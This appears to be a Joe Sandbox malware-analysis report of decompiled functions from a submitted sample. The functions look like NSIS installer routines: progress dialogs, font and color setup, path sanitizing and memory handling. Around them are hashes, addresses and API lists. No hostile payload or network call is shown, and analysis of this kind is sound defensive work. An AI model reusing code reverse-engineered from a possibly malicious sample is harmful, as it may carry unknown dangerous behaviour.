0x004046b3
0x004046bb
0x004046c1
0x004046c1
0x004046cb
0x004046d0
0x004046d3
0x004046d8
0x004046db
0x004046db
0x004046eb
0x004046eb
0x00000000
0x004046ee

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404648
GetSysColor.USER32 ref: 00404686
SetTextColor.GDI32(?,00000000), ref: 00404692
SetBkMode.GDI32(?,?), ref: 0040469E
GetSysColor.USER32 ref: 004046B1
SetBkColor.GDI32(?,?), ref: 004046C1
DeleteObject.GDI32(?), ref: 004046DB
CreateBrushIndirect.GDI32(?), ref: 004046E5

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58

Uniqueness

Uniqueness Score: -1.00%

Function 004068EF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004068EF(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004068f1
0x004068fa
0x00406911
0x00406911
0x00406918
0x00406924
0x00406924
0x00406927
0x0040692a
0x0040692f
0x00406931
0x0040693a
0x0040693e
0x0040695b
0x00406963
0x00406963
0x00406968
0x0040696a
0x0040696d
0x00406972
0x00406973
0x00406977
0x00406977
0x00406978
0x0040697f
0x00406981
0x00406988
0x00000000
0x00000000
0x00406990
0x00406996
0x00000000
0x00000000
0x00000000
0x00406996
0x0040699b

APIs

CharNextW.USER32(?), ref: 00406952
CharNextW.USER32(?), ref: 00406961
CharNextW.USER32(?), ref: 00406966
CharPrevW.USER32(?,?), ref: 00406979

Strings

*?|<>/":, xrefs: 00406941
C:\Users\user\AppData\Local\Temp\, xrefs: 004068F0

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3083651966
Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x420efc; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x420efc = 0;
					return _t15;
				}
				__eflags =  *0x420efc; // 0x0
				if(__eflags != 0) {
					return E00406A71(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x42a26c;
				if(_t6 >  *0x42a26c) {
					__eflags =  *0x42a268;
					if( *0x42a268 == 0) {
						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
						 *0x420efc = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x42a314 & 0x00000001;
					if(( *0x42a314 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056CA(0,  &_v132);
					}
				}
				return _t6;
			}

0x0040303d
0x0040303f
0x00403046
0x00403049
0x00403049
0x0040304f
0x00000000
0x0040304f
0x00403057
0x0040305d
0x00000000
0x00403060
0x00403067
0x0040306d
0x00403073
0x00403075
0x0040307b
0x004030b9
0x004030c2
0x00000000
0x004030c7
0x0040307d
0x00403084
0x00403095
0x00000000
0x004030a3
0x00403084
0x004030cf

APIs

DestroyWindow.USER32 ref: 00403049
GetTickCount.KERNEL32(00000000), ref: 00403067
wsprintfW.USER32 ref: 00403095

Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
Part of subcall function 004056CA: lstrcatW.KERNEL32 ref: 00405725
Part of subcall function 004056CA: SetWindowTextW.USER32 ref: 00405737
Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

CreateDialogParamW.USER32 ref: 004030B9
ShowWindow.USER32(00000000,00000005), ref: 004030C7

Part of subcall function 00403012: MulDiv.KERNEL32 ref: 00403027

Strings

... %d%%, xrefs: 0040308F

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: eb5829c7fffbc7bf65dde30d15e1f0a96a9438333430517d581b7dc81546266b
Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
Opcode Fuzzy Hash: eb5829c7fffbc7bf65dde30d15e1f0a96a9438333430517d581b7dc81546266b
Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 00404F7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404f8d
0x00404f9a
0x00404fa0
0x00404fde
0x00404fde
0x00404fed
0x00404ff4
0x00000000
0x00404ff6
0x00404fa2
0x00404fb1
0x00404fb9
0x00404fbc
0x00404fce
0x00404fd4
0x00404fdb
0x00000000
0x00404fdb
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
GetMessagePos.USER32 ref: 00404FA2
ScreenToClient.USER32(?,?), ref: 00404FBC
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4

Strings

f, xrefs: 00404FD0

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066A5(_t9, _t31, _t33, "Tahoma",  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065AF();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e4e
0x00401e59
0x00401e5b
0x00401e68
0x00401e7f
0x00401e84
0x00401e91
0x00401e96
0x00401e9a
0x00401ea5
0x00401eac
0x00401ebe
0x00401ec4
0x00401ec9
0x00401ed3
0x00402638
0x0040156d
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32 ref: 00401E73
ReleaseDC.USER32(?,00000000), ref: 00401E84

Part of subcall function 004066A5: lstrcatW.KERNEL32 ref: 0040684A
Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4

CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3

Strings

Tahoma, xrefs: 00401EB9

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID: Tahoma
API String ID: 2584051700-3580928618
Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED

Uniqueness

Uniqueness Score: -1.00%

Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a270 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402fa3
0x00402fb1
0x00402fb7
0x00402fb7
0x00402fc5
0x00402fc7
0x00402fd3
0x00402fd8
0x00402fda
0x00402fda
0x00402fe5
0x00402ff5
0x00403007
0x00403007
0x0040300f

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
wsprintfW.USER32 ref: 00402FE5
SetWindowTextW.USER32 ref: 00402FF5
SetDlgItemTextW.USER32 ref: 00403007

Strings

verifying installer: %d%%, xrefs: 00402FDA
unpacking data: %d%%, xrefs: 00402FD3, 00402FE3

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59

Uniqueness

Uniqueness Score: -1.00%

Function 73BF2655 Relevance: 9.1, APIs: 6, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E73BF2655() {
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t39;
				void* _t40;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t40 = E73BF12BB();
				_t24 =  *((intOrPtr*)(_t45 + 0x18));
				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
				_t43 = (_t44 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
					}
					_t39 =  *(_t43 - 8) & 0x000000ff;
					if(_t39 <= 7) {
						switch( *((intOrPtr*)(_t39 * 4 +  &M73BF2784))) {
							case 0:
								 *_t40 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									 *(__esp + 0x10) = __ecx;
									__ecx =  *(0x73bf407c + __edx * 4);
									__edx =  *(__esp + 0x10);
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x73bf409c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E73BF1510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__ecx =  *0x73bf506c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x73bf506c;
								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
								goto L17;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x73bf506c);
								goto L17;
							case 5:
								_push( *0x73bf506c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfW(__edi, 0x73bf5000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E73BF1381(_t27 - 1, _t40);
								goto L26;
							}
						} else {
							E73BF1312(_t40);
							L26:
						}
					}
					_t44 = _t44 - 1;
					_t43 = _t43 - 0x20;
				} while (_t44 >= 0);
				return GlobalFree(_t40);
			}

0x73bf265f
0x73bf2661
0x73bf2665
0x73bf2674
0x73bf2678
0x73bf267d
0x73bf267d
0x73bf2685
0x73bf268c
0x73bf2692
0x00000000
0x73bf2699
0x00000000
0x00000000
0x73bf26a1
0x73bf26a5
0x73bf26a8
0x73bf26ac
0x73bf26b3
0x73bf26b7
0x73bf26bd
0x73bf26bf
0x73bf26c1
0x73bf26c1
0x73bf26c8
0x00000000
0x00000000
0x73bf26d1
0x00000000
0x00000000
0x73bf26d8
0x73bf26de
0x73bf26e8
0x73bf26ee
0x73bf26f3
0x00000000
0x00000000
0x73bf2714
0x00000000
0x00000000
0x73bf26fa
0x73bf2700
0x73bf2701
0x73bf2703
0x00000000
0x00000000
0x73bf271c
0x73bf271e
0x73bf2724
0x73bf272a
0x73bf272a
0x00000000
0x00000000
0x73bf2692
0x73bf272d
0x73bf272d
0x73bf2732
0x73bf2743
0x73bf2743
0x73bf2749
0x73bf274e
0x73bf2753
0x73bf275f
0x73bf2764
0x00000000
0x73bf2769
0x73bf2755
0x73bf2756
0x73bf276a
0x73bf276a
0x73bf2753
0x73bf276b
0x73bf276c
0x73bf276f
0x73bf2783

APIs

Part of subcall function 73BF12BB: GlobalAlloc.KERNELBASE(00000040,?,73BF12DB,?,73BF137F,00000019,73BF11CA,-000000A0), ref: 73BF12C5

GlobalFree.KERNEL32(?), ref: 73BF2743
GlobalFree.KERNEL32(00000000), ref: 73BF2778

Memory Dump Source

Source File: 00000004.00000002.1181655845.0000000073BF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73BF0000, based on PE: true

Associated: 00000004.00000002.1181643941.0000000073BF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1181681775.0000000073BF4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1181696528.0000000073BF6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73bf0000_venxajlddf.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 04dbf5185666cc9a59937e4b74e9eb471c4b7287b909e7369548d2989d814ebb
Instruction ID: 83722095153619e2fc04048df1a5938120b3adaa5d5728657a55f5797dfd95ed
Opcode Fuzzy Hash: 04dbf5185666cc9a59937e4b74e9eb471c4b7287b909e7369548d2989d814ebb
Instruction Fuzzy Hash: C431E47650410BEFE7269F65CAD4F2A7BBAFB85300724653DF1059BAA0D7315C08CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00402950(void* __ebx, void* __eflags) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FAE(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406133(_t55);
				_t29 = E00406158(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x42a274;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035F8(_t49);
							E004035E2(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}

0x00402950
0x00402952
0x00402957
0x0040295c
0x0040295f
0x00402969
0x0040296d
0x0040296d
0x00402973
0x00402980
0x00402988
0x0040298b
0x00402997
0x0040299a
0x004029a0
0x004029ae
0x004029b3
0x004029b7
0x004029ba
0x004029c3
0x004029cf
0x004029d3
0x004029d6
0x004029e0
0x004029ff
0x004029e7
0x004029ec
0x004029f4
0x004029f7
0x004029fc
0x004029fc
0x00402a06
0x00402a06
0x00402a13
0x00402a19
0x00402a1f
0x00402a1f
0x004029b7
0x00402a33
0x00402a35
0x00402a35
0x00402a3f
0x00402a40
0x00402a44
0x00402a48
0x00402a4e
0x00402a4e
0x00402a55
0x004022f1
0x00402c2d
0x00402c39

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32(?), ref: 00402A06
GlobalFree.KERNEL32(00000000), ref: 00402A19
CloseHandle.KERNEL32(?), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
